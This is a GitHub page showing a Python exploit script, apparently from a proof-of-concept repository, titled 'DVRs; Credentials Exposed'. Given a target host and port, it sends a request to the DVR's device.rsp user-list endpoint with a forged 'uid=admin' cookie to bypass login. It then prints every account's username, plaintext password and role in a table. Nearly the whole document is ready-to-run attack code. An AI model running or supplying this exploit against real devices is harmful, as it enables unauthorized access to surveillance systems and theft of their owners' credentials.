forked from ym2011/POC-EXP
-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathgetDVR_Credentials.py
124 lines (95 loc) · 3.39 KB
/
getDVR_Credentials.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
# -*- coding: utf-8 -*-
from __future__ import print_function
import json
import requests
import argparse
import tableprint as tp
class Colors:
BLUE = '\033[94m'
GREEN = '\033[32m'
RED = '\033[0;31m'
DEFAULT = '\033[0m'
ORANGE = '\033[33m'
WHITE = '\033[97m'
BOLD = '\033[1m'
BR_COLOUR = '\033[1;37;40m'
banner = '''
__..--.._
..... .--~ ..... `.
.": "`-.. . .' ..-'" :". `
` `._ ` _.'`"( `-"'`._ ' _.' '
~~~ `. ~~~
.'
/
(
^---'
[*] @capitan_alfa
'''
details = '''
# Exploit Title: DVRs; Credentials Exposed
# Date: 09/04/2018
# Exploit Author: Fernandez Ezequiel ( @capitan_alfa )
# version: 1.2
'''
parser = argparse.ArgumentParser(prog='getDVR_Credentials.py',
description=' [+] Obtaining Exposed credentials',
epilog='[+] Demo: python getDVR_Credentials.py --host 192.168.1.101 -p 81')
parser.add_argument('--host', dest="HOST", help='Host', required=True)
parser.add_argument('--port', dest="PORT", help='Port', default=80)
args = parser.parse_args()
HST = args.HOST
port = args.PORT
headers = {}
fullHost_1 = "http://"+HST+":"+str(port)+"/device.rsp?opt=user&cmd=list"
host = "http://"+HST+":"+str(port)+"/"
print(Colors.GREEN+banner+Colors.DEFAULT)
def makeReqHeaders(xCookie):
headers["Host"] = host
headers["User-Agent"] = "Morzilla/7.0 (911; Pinux x86_128; rv:9743.0)"
headers["Accept"] = "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
headers["Accept-Languag"] = "es-AR,en-US;q=0.7,en;q=0.3"
headers["Connection"] = "close"
headers["Content-Type"] = "text/html"
headers["Cookie"] = "uid="+xCookie
return headers
try:
rX = requests.get(fullHost_1,headers=makeReqHeaders(xCookie="admin"),timeout=10.000)
except Exception as e:
#print(e)
print(Colors.RED+" [+] Timed out\n"+Colors.DEFAULT)
exit()
badJson = rX.text
try:
dataJson = json.loads(badJson)
totUsr = len(dataJson["list"])
except Exception as e:
print(" [+] Error: "+str(e))
print(" [>] json: "+str(rX))
exit()
print(Colors.GREEN+"\n [+] DVR (url):\t\t"+Colors.ORANGE+str(host)+Colors.GREEN)
print(" [+] Port: \t\t"+Colors.ORANGE+str(port)+Colors.DEFAULT)
print(Colors.GREEN+"\n [+] Users List:\t"+Colors.ORANGE+str(totUsr)+Colors.DEFAULT)
print(" ")
final_data = []
try:
for obj in range(0,totUsr):
temp = []
_usuario = dataJson["list"][obj]["uid"]
_password = dataJson["list"][obj]["pwd"]
_role = dataJson["list"][obj]["role"]
temp.append(_usuario)
temp.append(_password)
temp.append(_role)
final_data.append(temp)
hdUsr = Colors.GREEN + "Username" + Colors.DEFAULT
hdPass = Colors.GREEN + "Password" + Colors.DEFAULT
hdRole = Colors.GREEN + "Role ID" + Colors.DEFAULT
cabeceras = [hdUsr, hdPass, hdRole]
tp.table(final_data, cabeceras, width=20)
except Exception as e:
print(" [!]: "+str(e))
print(" [+] "+ str(dataJson))
print(" ")
thanks = '''
[*] https://github.com/cclauss --> Accepted suggestion: compatibility with python 3
'''